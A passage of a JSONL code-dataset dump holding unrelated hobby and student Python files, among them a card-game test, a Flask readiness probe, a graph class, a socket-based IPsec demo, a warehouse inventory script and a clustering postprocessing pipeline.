vec_env.agent_selections()]\n play_all_moves_of_player(vec_env.get_envs(), player_policy, \"player_1\")\n [self.assertEqual(agent, \"player_0\") for agent in vec_env.agent_selections()]\n\n def test_play_all_moves_of_players(self):\n vec_env = VectorizedEnv(lambda: TwoPlayerBriscola(), 271)\n n_actions = vec_env.single_action_space().n\n player_policies = [RandomAgent(n_actions)] * 19\n vec_env.reset()\n for _ in range(Constants.deck_cards // (2 * Constants.n_agents) + 1):\n play_all_moves_of_players(vec_env.get_envs(), player_policies, \"player_0\")\n [self.assertEqual(agent, \"player_1\") for agent in vec_env.agent_selections()]\n play_all_moves_of_players(vec_env.get_envs(), player_policies, \"player_1\")\n [self.assertEqual(agent, \"player_0\") for agent in vec_env.agent_selections()]\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"LetteraUnica/BriscolaBot","sub_path":"test/utils/test_train_utils.py","file_name":"test_train_utils.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"62"} +{"seq_id":"30660740059","text":"import signal\nimport time\nfrom flask import Flask\nfrom loguru import logger\n\napp = Flask(__name__)\n\nterminated = False\n\n\n@app.route('/', methods=['GET'])\ndef index():\n time.sleep(0.1)\n return 'Hello world 2\\n'\n\n\n@app.route('/ready')\ndef status():\n logger.info(f'readiness probe with status: {\"terminated\" if terminated else \"healthy\"}')\n if not terminated:\n return 'OK', 200\n else:\n return 'NotReady', 500\n\n\ndef signal_handler(signum, frame):\n global terminated\n logger.info(f'Handling signal {signum}')\n terminated = True\n\n\nif __name__ == '__main__':\n signal.signal(signal.SIGTERM, signal_handler)\n signal.signal(signal.SIGINT, signal_handler)\n app.run(debug=True, port=8080, host='0.0.0.0')\n","repo_name":"alonitac/DevOpsMay22","sub_path":"13_zero_downtime_flask_k8s/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"62"} +{"seq_id":"8885929809","text":"class Node:\r\n def __init__(self, string):\r\n self.label = string\r\n\r\n\r\nclass Graph:\r\n def __init__(self):\r\n super().__init__()\r\n self.vertices = {}\r\n self.adjacencyList = {}\r\n\r\n def addNode(self, label):\r\n node = Node(label)\r\n if label not in self.vertices:\r\n self.vertices[label] = node\r\n if label not in self.adjacencyList:\r\n self.adjacencyList[node ] = []\r\n\r\n def removeNode(self, label):\r\n if label not in self.vertices:\r\n return\r\n self.vertices.pop(label)\r\n self.__removeAdjacency(label)\r\n self.__removeAdjEdge(label)\r\n\r\n def addEdge(self, start, end):\r\n start = self.vertices.get(start)\r\n end = self.vertices.get(end)\r\n self.adjacencyList.get(start).append(end)\r\n\r\n def removeEdge(self, start, end):\r\n start, end = self.__removeNodeValues(start, end)\r\n if end in self.adjacencyList.get(start):\r\n self.adjacencyList.get(start).remove(end)\r\n\r\n def depthTransverse(self, node):\r\n transversed = []\r\n self.__depthTransverse(transversed, node)\r\n return transversed\r\n\r\n def breadthTransverse(self, node):\r\n queue = [node]\r\n transversed = []\r\n self.__breadthTransverse(queue, transversed)\r\n return transversed\r\n\r\n def topologicalSort(self):\r\n stack = []\r\n if not self.hasCycle():\r\n self.__topologicalSort(stack, self.__getTopologyKey())\r\n else:\r\n return \"Graph have Cycle. So topological Sort can't perform\"\r\n return self.__popStack(stack)\r\n\r\n def hasCycle(self):\r\n cycle = False\r\n for key in self.adjacencyList.keys():\r\n visited = []\r\n cycle = self.__checkCycle(visited, key, cycle)\r\n if cycle:\r\n break\r\n return cycle\r\n\r\n def display(self):\r\n for key in self.adjacencyList.keys():\r\n print(f'{key.label} connected to {self.__getEdges(key)}')\r\n\r\n def __getEdges(self, key):\r\n connections = []\r\n for node in self.adjacencyList.get(key):\r\n connections.append(node.label)\r\n return connections\r\n\r\n def __removeAdjacency(self, label):\r\n for node in self.adjacencyList.keys():\r\n if node.label == label:\r\n remove_node = node\r\n self.adjacencyList.pop(remove_node)\r\n\r\n def __removeAdjEdge(self, label):\r\n for key in self.vertices.keys():\r\n self.removeEdge(key, label)\r\n\r\n def __removeNodeValues(self, start, end):\r\n for node in self.adjacencyList.keys():\r\n if node.label == start:\r\n start = node\r\n for node in self.adjacencyList.get(start):\r\n if node.label == end:\r\n end = node\r\n return start, end\r\n\r\n def __depthTransverse(self, transversed, node):\r\n if node in transversed:\r\n return\r\n if node is None:\r\n return\r\n transversed.append(node)\r\n for key in self.adjacencyList.keys():\r\n if key.label == node:\r\n node = key\r\n if self.adjacencyList.get(node) is not None:\r\n for obj in self.adjacencyList.get(node):\r\n self.__depthTransverse(transversed, obj.label)\r\n\r\n def __breadthTransverse(self, queue, transversed):\r\n if len(queue) > 0:\r\n if queue[0] not in transversed:\r\n transversed.append(queue[0])\r\n for key in self.adjacencyList.keys():\r\n if key.label == queue[0]:\r\n nodes = key\r\n if self.adjacencyList.get(nodes) is not None:\r\n for node in self.adjacencyList.get(nodes):\r\n queue.append(node.label)\r\n queue.pop(0)\r\n self.__breadthTransverse(queue, transversed)\r\n\r\n def __topologicalSort(self, stack, key):\r\n if key is None:\r\n return\r\n if key.label not in stack:\r\n for node in self.adjacencyList.get(key):\r\n self.__topologicalSort(stack, node)\r\n if key.label not in stack:\r\n stack.append(key.label)\r\n\r\n def __getTopologyKey(self):\r\n for key in self.adjacencyList.keys():\r\n return key\r\n\r\n def __popStack(self, stack):\r\n topological_sort = ''\r\n for i in range(len(stack)-1, -1, -1):\r\n topological_sort += stack[i]\r\n return topological_sort\r\n\r\n def __checkCycle(self, visited, key, cycle) -> bool:\r\n visited.append(key.label)\r\n for node in self.adjacencyList.get(key):\r\n if node.label in visited:\r\n cycle = True\r\n return cycle\r\n else:\r\n return self.__checkCycle(visited, node, cycle)\r\n if cycle is not True:\r\n return False\r\n\r\n\r\n\r\ngraph = Graph()\r\ngraph.addNode('x')\r\ngraph.addNode('a')\r\ngraph.addNode('b')\r\ngraph.addNode('p')\r\ngraph.addEdge('x', 'a')\r\ngraph.addEdge('x', 'b')\r\ngraph.addEdge('a', 'p')\r\ngraph.addEdge('b', 'p')\r\ngraph.addEdge('p', 'x')\r\ngraph.display()\r\n#print(f'Depth Transverse : {graph.depthTransverse(\"a\")}')\r\n#print(f'Depth Transverse : {graph.breadthTransverse(\"a\")}')\r\nprint(graph.topologicalSort())","repo_name":"zeeshan-akram/Data-Structures-and-Algorithms-Python","sub_path":"Graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"38372262518","text":"from ast import Bytes\nimport socket\nimport pickle\nimport os\nimport sys\nfrom threading import Thread\nimport time\nfrom IpSec import IKE2, IpSec, Messeng\nimport pyDH\nclass Server():\n #ownIpAdress = \"127.0.1.1\"\n \n #ownIpAdress = \"192.168.1.2\"\n localPort = 80\n bufferSize = 2048\n serverStatus = True\n msgBuffor = None\n def __init__(self,ownIpAdress, quote,netMonitor):\n self.ownIpAdress = ownIpAdress\n self.quote=quote\n self.netMonitor=netMonitor\n\n \n def start(self):\n self.ownIpAdress = \"127.0.1.1\" \n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((self.ownIpAdress, self.localPort))\n s.listen(1)\n while (True and self.serverStatus == True):\n conn, addr = s.accept()\n \n #print ('Connection address:', addr)\n data = conn.recv(self.bufferSize )\n conn.close()\n if not data: break\n data = pickle.loads(data)\n self.netMonitor.put(\"Serwer odebral wiadomosc\" + str(data))\n\n if data[0] == 0 :\n odczyatana = data\n odczyatana[1] = IpSec.fromBytes(data[1])\n self.quote.put(Messeng(odczyatana,str(addr[0]),str(self.ownIpAdress)))\n #self.quote.put(data)\n #print (\"received data:\", data)\n\n \n if data[0] == 1 :\n print (\"received data:\", data[1], flush=True)\n self.quote.put(Messeng(data,str(addr[0]),str(self.ownIpAdress)))\n d = pyDH.DiffieHellman()\n dh = d.gen_public_key()\n self.quote.put(Messeng([2,dh],str(addr[0]),str(self.ownIpAdress)))\n #conn.send(pickle.dumps('repo')) # echo\n \n \n \n\n if data[0] == 2 :\n print (\"received data:\", data[1], flush=True)\n self.quote.put(Messeng(data,str(addr[0]),str(self.ownIpAdress)))\n \n \n \n \n def stop(self):\n self.serverStatus = False\n\n\n\nclass Client():\n def sendMesseng(dstIp,data,netMonitor):\n #dstIp = \"127.0.1.1\"\n dstIP = \"127.0.1.1\"\n TCP_PORT = 80\n BUFFER_SIZE = 1024\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((dstIp, TCP_PORT))\n print(\"jestem w Kliencie \", data, flush=True)\n netMonitor.put(\"Klient wysyla widosmoc\" + str(data))\n s.send(pickle.dumps(data))\n #data = s.recv(BUFFER_SIZE)\n s.close()\n # print (\"received data:\", data)\n\n\n#Lista komunikatw wysyanych przez Clienta [komunikat,dana]:\n #0 - Wiadomosc\n #1 - KLucz publiczny z wymuszeniem wymiany \n #2- Klucz publiczny jako odpowiedz\n\n\n","repo_name":"LukaszCzerniszewski/Demonstrator-IPsec","sub_path":"communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11011091518","text":"import pika\nimport json\nimport os\nimport sys\nimport time\nfrom pymongo import MongoClient\nimport flask\nimport pprint\nimport uuid\nimport pika\nimport traceback\nimport redis\n\nredisConnection = None\nwhile redisConnection is None:\n time.sleep(1)\n try:\n redisConnection = redis.StrictRedis(host='redis', port=6379, db=0)\n except:\n print(\"Error in connection to redis\")\n sys.stderr.flush()\n sys.stdout.flush()\n\nmongoConnection = None\nwhile mongoConnection is None:\n time.sleep(1)\n try:\n mongoConnection = MongoClient('mongo', 27017)\n except:\n print(\"Error in connection to mongo\")\n sys.stdout.flush()\n\n\n\n\napp = flask.Flask(__name__)\n\ndef publishTasksToRabbit(taskId, carIdsList):\n rabbitConnection = pika.BlockingConnection(pika.ConnectionParameters(host='rabbitmq'))\n\n channel = rabbitConnection.channel()\n channel.queue_declare(queue='report_queue', durable=True)\n for carId in carIdsList:\n taskToPublish = {\"taskId\": taskId, \"id\" : carId}\n channel.basic_publish(exchange='',\n routing_key='report_queue',\n body=json.dumps(taskToPublish),\n properties=pika.BasicProperties(\n delivery_mode = 2, # make message persistent\n ))\n rabbitConnection.close()\n\n@app.route('/report-group-distance/')\ndef reportDistance(groupId):\n global mongoConnection\n global redisConnection\n\n\n UUID = str(uuid.uuid4())\n\n idsList = list(mongoConnection.cars.incoming.find({\"group\": int(groupId)}).distinct(\"id\"))\n\n print(idsList)\n sys.stdout.flush()\n\n redisConnection.set(UUID, len(idsList))\n publishTasksToRabbit(taskId=UUID, idsList=idsList)\n\n while int(redisConnection.get(UUID)) > 0:\n time.sleep(0.1)\n\n redisConnection.delete(UUID)\n toReturn = redisConnection.get(UUID+\"_result\")\n redisConnection.delete(UUID+\"_result\")\n return str(toReturn)\n\napp.run(host='0.0.0.0', port=80, threaded = True)\n","repo_name":"jakubbujny/docker-workshops","sub_path":"report_service/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"72215984836","text":"from random import randint\r\nimport csv\r\n\r\n#import math\r\n#import copy\r\n\r\n\r\nmainmenu = [\"1:Add a new item \", \"2:Move an item\", \"3:search an item\",\r\n \"4:view the inventory of a warehouse\", \"0: exit the system\"]\r\n\r\nwarehouseA = []\r\nwarehouseATV = 0\r\n\r\n\r\n\r\ndef addNewItem():\r\n \r\n global warehouseA\r\n global warehouseATV\r\n loadFile()\r\n itemId = input(\"Please give the ID\")\r\n description = input(\"Please give the name or description:\")\r\n value = input(\"Please give the value\")\r\n warehouse = input(\"Please give the warehouse name\")\r\n\r\n if warehouse == 'A':\r\n \r\n warehouseA.append([itemId, description, value])\r\n # an oxi kanw kati allo\r\n warehouseATV += int(value)\r\n \r\n for i in warehouseA:\r\n print(i)\r\n \r\ndef menu():\r\n\r\n # display a main menu\r\n for i in mainmenu:\r\n print(i)\r\n\r\n # get the choice from the keyboard\r\n c = input(\"please choose a number or press any other key to return:\")\r\n if c == '1':\r\n addNewItem()\r\n elif c == '0':\r\n exit(0)\r\n else:\r\n menu()\r\n \r\n\r\ndef loadFile():\r\n \r\n global warehouseATV\r\n global warehouseA\r\n with open(\"DADSA Assignment 2018-19 Warehouse A.csv \") as f:\r\n f.readline()\r\n\r\n csv_reader = csv.reader(f)\r\n #Itterate throuht the file\r\n for line in csv_reader:\r\n #print(line)\r\n warehouseA.append(line)\r\n warehouseATV = warehouseATV + int(line[2])\r\n\r\nmenu()\r\n\r\nprint(\"TOTAL VALUE OF WAREHOUSEA IS \" , warehouseATV)\r\nprint(warehouseA)\r\n#gui beggining\r\n#from tkinter import *\r\n#root = Tk()\r\n#thelabel = Label(root, text=\"WELCOME\")\r\n#theLabel.pack()\r\n#root.mainloop()","repo_name":"david-georgiev/trial","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"72326191877","text":"def count_swaps(sorted_list, num_list):\n swaps = 0\n\n position_map = {}\n for index, num in enumerate(num_list):\n position_map[num] = index\n\n for index, num in enumerate(num_list):\n if num != sorted_list[index]:\n swaps += 1\n pos = position_map[sorted_list[index]]\n # IMPORTANT: update indices within position_map\n position_map[num_list[index]] = pos\n position_map[num_list[pos]] = index\n # swap values as well\n num_list[index], num_list[pos] = num_list[pos], num_list[index]\n\n return swaps\n\n\ndef lilysHomework(arr):\n arr_copy = list(arr)\n\n sorted_list_asc = sorted(arr, reverse=False)\n sorted_list_dsc = sorted(arr_copy, reverse=True)\n\n swaps_a = count_swaps(sorted_list_asc, arr)\n swaps_d = count_swaps(sorted_list_dsc, arr_copy)\n\n return min(swaps_a, swaps_d)\n\n\n# pseduo code:\n# 1. Create a copy of the array\n# 2. Sort the array in ascending order\n# 3. Sort the copy of the array in descending order\n# 4. Count the number of swaps needed to sort the array in ascending order\n# 5. Count the number of swaps needed to sort the copy of the array in descending order\n\n# overall equation for running time:\n# T = O(n log n)\n\n\nif __name__ == '__main__':\n arr = [7, 15, 12, 3]\n arr2 = [3, 4, 1]\n arr3 = [2, 5, 3, 1, 9, 6, 7, 8, 4, ]\n\n print(lilysHomework(arr))\n print(lilysHomework(arr2))\n print(lilysHomework(arr3))\n","repo_name":"Lekipising/glowing-palm-tree","sub_path":"q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"1355831644","text":"import requests\nimport time\n\nurl = 'http://104.248.58.163:8200'\n\nchallenge = requests.get('{}/challenge'.format(url)).text.split(',')\n\ncache = dict()\n\ndecoded = '' \ntotal_start = time.time()\nprint(\"Decoding {} letters\".format(len(challenge)))\nfor i in challenge:\n start_time = time.time()\n if i not in cache:\n answer = requests.get('{}/decode'.format(url),params={'value':i}).text\n cache[i] = answer\n else:\n answer = cache[i]\n decoded += answer\n end_time = time.time()\n\nprint(decoded)\ntotal_end = time.time()\n\nprint(\"Took a total of {} seconds\".format(int(total_end - total_start)))","repo_name":"opbro/use_a_cache_challenge","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"36250850583","text":"import CoffeeMachineMenus as menu\n\n\ndef validate_flavor_info(machine):\n # Emojis used\n hungry = '\\U0001f60b'\n cup_coffee = '\\u2615'\n ingredients = '\\U0001f374'\n pencil = '\\u2712\\ufe0f'\n\n # Flavors created\n flavors_created = [name.name for name in machine.flavors]\n print(f\"{pencil} WRITING THE RECIPE {pencil}\")\n while True:\n name = input(f\"{cup_coffee} What is the drink's name: \").strip().title()\n if name in flavors_created:\n print(\"A flavor with this name already exists! Try another name\")\n continue\n else:\n break\n\n print(f\"{ingredients} ENTER THE RIGHT INGREDIENTS TO THE {name}\")\n water = menu.validate_number(f\"{menu.water} How much water (ml) goes in: \")\n milk = menu.validate_number(f\"{menu.milk} How much milk (ml) goes in: \")\n coffee = menu.validate_number(f\"{cup_coffee} How much coffee (g) goes in: \")\n cost = menu.validate_number(f\"{menu.coin} How much {name} will cost: $ \")\n flavor = Flavor(name, {'Water': water, 'Milk': milk, 'Coffee': coffee}, cost)\n print(f\"{menu.assistant}: Hmmm, I wonder what this is gonna taste like! {hungry}\\n{'-' * 50}\")\n machine.flavors.append(flavor)\n\n\nclass Flavor:\n def __init__(self, name, ingredients, cost):\n \"\"\"\n Starts a new flavor of Coffee, with the given: Ingredients - Name - Cost\n \"\"\"\n self._name = name\n self._ingredients = ingredients\n self._cost = cost\n\n @property\n def name(self):\n return self._name\n\n @property\n def ingredients(self):\n return self._ingredients\n\n @property\n def cost(self):\n return self._cost\n\n @name.setter\n def name(self, new_name):\n self._name = new_name\n\n def set_cost(self):\n new_value = menu.validate_number(\"Enter the new value: $ \")\n self._cost = new_value\n\n def __str__(self):\n return f\"{self.__class__.__name__} --> {' | '.join([f'{k}: {v}' for k,v in self.__dict__.items()])}\"\n","repo_name":"victrralvss/100-Days-of-Code-Python","sub_path":"BEGINNER-SECTION/CoffeeMachine/Flavors.py","file_name":"Flavors.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"38527798227","text":"###Check whether cluster 0 should be dropped for any of these\n\nimport pandas as pd\nfrom Systematic_postprocessing_formulation import *\n\n#Set file to display all columns of pandas dataframe when print statement is called\npd.set_option('display.max_columns', None)\n\n#-------------- Load and analyze output of K-means/IP algorithm ------------#\n\n#Load original dataset to extract block names\nfile = \"../Data/MP_Final_Predictions_with_GPS_coordinates.xlsx\"\ndf = pd.read_excel(file)\n\n#Compile algorithm output and stats from block level runs into one dataset\ncluster_results_original, cluster_stats_original, dist_stats_original, OOSC_stats_original, cluster_centers_original = compile_original_results(original_df = df)\n\n#Analyze results of algorithm\nEG_districts = EG_subset(df)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_original, dist_stats_ = dist_stats_original)\nstats_figures(dist_stats_ = dist_stats_original, cluster_stats_ = cluster_stats_original, postprocessing_stage = 0)\n\n#Generate map for results - Use jupyter notebook\n\n#------------- Postprocessing Stage 1 --------------------#\n'''\nDissolve clusters with 4 or less villages and assign these villages to closest cluster\n'''\nprint(\"--------------- Posptrocessing Stage 1: Dissolving clusters with 4 or less villages and reassigning them to closest cluster ----------\")\npostprocessing_small(cluster_results_ = cluster_results_original, cluster_stats_ = cluster_stats_original, cluster_centers_ = cluster_centers_original)\n\n#Generate stats for these postprocessed results\nfile = \"Excel_results/Postprocessed1/Postprocessed1_dropsmall.xlsx\"\ncluster_results_1 = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\nclusters_dropped_df = pd.read_excel(file, sheet_name = \"Clusters_dropped\")\ncluster_vals_dropped = list(clusters_dropped_df[\"Clusters_dropped\"].values)\ncluster_centers_1 = compute_centers(cluster_results_1)\n\ncluster_stats_1, dist_stats_1, OOSC_stats_1 = recompute_final_stats(centers_ = cluster_centers_1, cluster_results_ = cluster_results_1, clusters_dropped = cluster_vals_dropped)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_1, dist_stats_ = dist_stats_1)\nstats_figures(dist_stats_ = dist_stats_1, cluster_stats_ = cluster_stats_1, postprocessing_stage = 1)\n\n#Generate map for this iteration of postprocessing - Use jupyter notebook file\n\n#------------- Postprocessing Stage 2 --------------------#\n'''\nUncluster villages who are 5 or more km from their cluster centers and reassign them to closest cluster\nHelps with overlapping villages\n'''\n\nprint(\"--------------- Posptrocessing Stage 2: Unclustering villages who are 5 or more km from their cluster centers and reassigning them to closest cluster ----------\")\npostprocessing_far(cluster_results_ = cluster_results_1, centers_df = cluster_centers_1)\n\n# #Generate stats for these postprocessed results\nfile = \"Excel_results/Postprocessed2/Postprocessed2_far.xlsx\"\ncluster_results_2 = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\ncluster_centers_2 = compute_centers(cluster_results_2)\n\ncluster_stats_2, dist_stats_2, OOSC_stats_2 = recompute_final_stats(centers_ = cluster_centers_2, cluster_results_ = cluster_results_2, clusters_dropped = cluster_vals_dropped)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_2, dist_stats_ = dist_stats_2)\nstats_figures(dist_stats_ = dist_stats_2, cluster_stats_ = cluster_stats_2, postprocessing_stage = 2)\n\n# #Generate map for this iteration of postprocessing - Use jupyter notebook file\n\n#------------- Postprocessing Stage 3 --------------------#\n'''\nBring the number of clustered villages up to 1800 with two steps:\nA. Add in unclustered villages with 15 or more OOSC (15 demarks the start of the right tail of the OOSC dist)\nB. Add in remaining necessary villages by increasing distance to existing cluster centers'''\n\nprint(\"--------------- Posptrocessing Stage 3a: Adding in villages with 15 or more OOSC ----------\")\n\npostprocessing_addbyOOSC(cluster_results_ = cluster_results_2, centers_df_ = cluster_centers_2)\nfile = \"Excel_results/Postprocessed3/Postprocessed3a_addOOSC.xlsx\"\ncluster_results_3a = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\ncluster_centers_3a = compute_centers(cluster_results_3a)\n\nprint(\"------ Posptrocessing Stage 3b: Adding in enough remaining villages to reach 1800 goal in order of distance to existing clusters----------\")\n\npostprocessing_addbydist(cluster_results_ = cluster_results_3a, centers_df_ = cluster_centers_3a)\nfile = \"Excel_results/Postprocessed3/Postprocessed3b_addbydist.xlsx\"\ncluster_results_3b = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\ncluster_centers_3b = compute_centers(cluster_results_3b)\n\n#Generate stats for these postprocessed results\ncluster_stats_3, dist_stats_3, OOSC_stats_3 = recompute_final_stats(centers_ = cluster_centers_3b, cluster_results_ = cluster_results_3b, clusters_dropped = cluster_vals_dropped)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_3, dist_stats_ = dist_stats_3)\nstats_figures(dist_stats_ = dist_stats_3, cluster_stats_ = cluster_stats_3, postprocessing_stage = 3)\n\n#Generate map for this iteration of postprocessing - Use jupyter notebook file\n\n#------------- Postprocessing Stage 4 --------------------#\n'''\nManually fix a few clusters'''\n\nprint(\"--------------- Posptrocessing Stage 4: Manually fixing a few clusters ----------\")\ncluster_results_new = cluster_results_3b.copy()\n\n#Fix overlapping clusters\n#Dissolve cluster 172 and reassign to either 211 or 212\ncluster_results_new.loc[(cluster_results_new.Block == \"BADARWAS\") & (cluster_results_new.Village == \"LAGDA\"), \"cluster_id\"] = 211\ncluster_results_new.loc[cluster_results_new.cluster_id == 172, \"cluster_id\"] = 212\n\n# Move village in 234\ncluster_results_new.loc[(cluster_results_new.Block == \"PICHHORE\") & (cluster_results_new.Village == \"KAMALPUR\"), \"cluster_id\"] = 195\n\n# Move village in 277\ncluster_results_new.loc[(cluster_results_new.Block == \"SHIVPURI\") & (cluster_results_new.Village == \"SOOND\"), \"cluster_id\"] = 241\n\n#Appending cluster 172 to list of clusters that have been dropped in postprocessing\ncluster_vals_dropped.append(172)\nclusters_dropped_df = pd.DataFrame({\"Clusters_dropped\":cluster_vals_dropped})\n\nwriter = pd.ExcelWriter(\"Excel_results/Postprocessed4/Postprocessed_manual.xlsx\")\ncluster_results_new.to_excel(excel_writer = writer, sheet_name = 'Cluster_assignments')\nclusters_dropped_df.to_excel(excel_writer = writer, sheet_name = 'Clusters_dropped')\nwriter.save()\n\n#Generating statistics for this postprocessing stage\nfile = \"Excel_results/Postprocessed4/Postprocessed_manual.xlsx\"\ncluster_results_4 = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\nclusters_dropped_df = pd.read_excel(file, sheet_name = 'Clusters_dropped')\ncluster_vals_dropped = list(clusters_dropped_df[\"Clusters_dropped\"].values)\n\ncluster_centers_4 = compute_centers(cluster_results_4)\n\n#Generate stats for these postprocessed results\ncluster_stats_4, dist_stats_4, OOSC_stats_4 = recompute_final_stats(centers_ = cluster_centers_4, cluster_results_ = cluster_results_4, clusters_dropped = cluster_vals_dropped)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_4, dist_stats_ = dist_stats_4)\nstats_figures(dist_stats_ = dist_stats_4, cluster_stats_ = cluster_stats_4, postprocessing_stage = 4)\n\n#------------- Postprocessing Stage 5 --------------------#\n'''\nRefix small clusters that were created during postprocessing\nDissolves clusters with 4 or less villages and less than 100 OOSC and reassigns these villages\nto closest cluster\n'''\n\nprint(\"--------- Posptrocessing Stage 5: Dissolving and reassigning clusters with 4 or fewer villages and less than 100 OOSC ----------\")\npostprocessing_small_if_few(cluster_stats_ = cluster_stats_4, cluster_results_ = cluster_results_4, centers_df_ = cluster_centers_4, cluster_vals_dropped_ = cluster_vals_dropped)\n\n#Generate stats for these postprocessed results\nfile = \"Excel_results/Postprocessed5/Postprocessed5_smallfew.xlsx\"\ncluster_results_5 = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\nclusters_dropped_df = pd.read_excel(file, sheet_name = 'Clusters_dropped')\ncluster_vals_dropped = list(clusters_dropped_df[\"Clusters_dropped\"].values)\ncluster_centers_5 = compute_centers(cluster_results_5)\n\ncluster_stats_5, dist_stats_5, OOSC_stats_5 = recompute_final_stats(centers_ = cluster_centers_5, cluster_results_ = cluster_results_5, clusters_dropped = cluster_vals_dropped)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_5, dist_stats_ = dist_stats_5)\nstats_figures(dist_stats_ = dist_stats_5, cluster_stats_ = cluster_stats_5, postprocessing_stage = 5)\n\n#------------- Renumber cluster IDs in final results --------------------#\n'''\nRenumber cluster IDs so that they are continuous accounting for dropped clusters\n'''\nprint(\"--------- Posptrocessing done, Renumbering clusters so that cluster IDs are continuous ----------\")\n\nrenumber_clusters(cluster_results_ = cluster_results_5)\n#Generate stats for these postprocessed results\nfile = \"Excel_results/Renumbered/Final_clusters.xlsx\"\ncluster_results_final = pd.read_excel(file, sheet_name = \"Cluster_assignments\")\ncluster_centers_final = compute_centers(cluster_results_5)\n\ncluster_stats_final, dist_stats_final, OOSC_stats_final = recompute_final_stats(centers_ = cluster_centers_final, cluster_results_ = cluster_results_final)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_final, dist_stats_ = dist_stats_final)\nstats_figures(dist_stats_ = dist_stats_final, cluster_stats_ = cluster_stats_final, postprocessing_stage = \"final\")\n\n","repo_name":"mghersher/targeting_algorithm","sub_path":"Systematic_postprocessing_run.py","file_name":"Systematic_postprocessing_run.py","file_ext":"py","file_size_in_byte":9711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"29616213059","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"mhcshrubs\",\n version=\"0.2.0\",\n author=\"Christiaan H. van Dorp\",\n author_email=\"chvandorp@gmail.com\",\n description=\"Find associations between MHC genotype and disease traits using MHC similarities\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/chvandorp/MHCshrubs\",\n packages=setuptools.find_packages(),\n include_package_data=True,\n package_data={\n '' : ['stan/*.stan', 'jags/*.bug', 'resources/*']\n },\n entry_points={\n 'console_scripts': [\n 'mhcshrubs = mhcshrubs.main:main'\n ]\n },\n install_requires=[\n 'numpy',\n 'scipy',\n 'PyQt5',\n 'ete3',\n 'networkx',\n 'tqdm',\n 'pystan',\n 'matplotlib'\n ],\n classifiers=(\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n ),\n)\n","repo_name":"chvandorp/MHCshrubs","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"16210697423","text":"from ECMH import MultiHash\n\nset1 = (b'lixp',)\nset3 = (b'lixp', b'0017')\nset4 = (b'0017', b'lixp')\nset2 = (b'lixp',b'lixp')\nresult1 = MultiHash(set1)\nresult2 = MultiHash(set2)\nresult3 = MultiHash(set3)\nresult4 = MultiHash(set4)\nprint(\"hash(set1) = \", result1)\nprint(\"hash(set2) = \", result2)\nprint(\"hash(set3) = \", result3)\nprint(\"hash(set4) = \", result4)","repo_name":"grey-potato/exp","sub_path":"SM2 ECMH.py","file_name":"SM2 ECMH.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"39012703102","text":"#coding=utf-8\nimport pandas as pd\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.metrics import log_loss\nfrom sklearn.naive_bayes import BernoulliNB\nimport time\n\ndef get_X(crime,train_one):\n lists = {}\n means = {}\n m_vars = {}\n length = len(crime)\n i = 0\n while(i < length):\n t_da = crime[i]\n if not lists.has_key(t_da):\n lists[t_da] = []\n means[t_da] = 0\n m_vars[t_da] = 0\n i = i + 1\n i = 0\n while(i < length):\n lists[train_one['category'][i]].append(train_one['X'][i])\n i = i + 1\n for key in lists.keys():\n #print key\n t_l = lists[key]\n t_a = np.array(t_l)\n means[key] = t_a.mean()\n m_vars[key] = np.cov(t_a)\n #print means\n #print m_vars\n return means,m_vars\n\ndef get_Y(crime,train_one):\n lists = {}\n means = 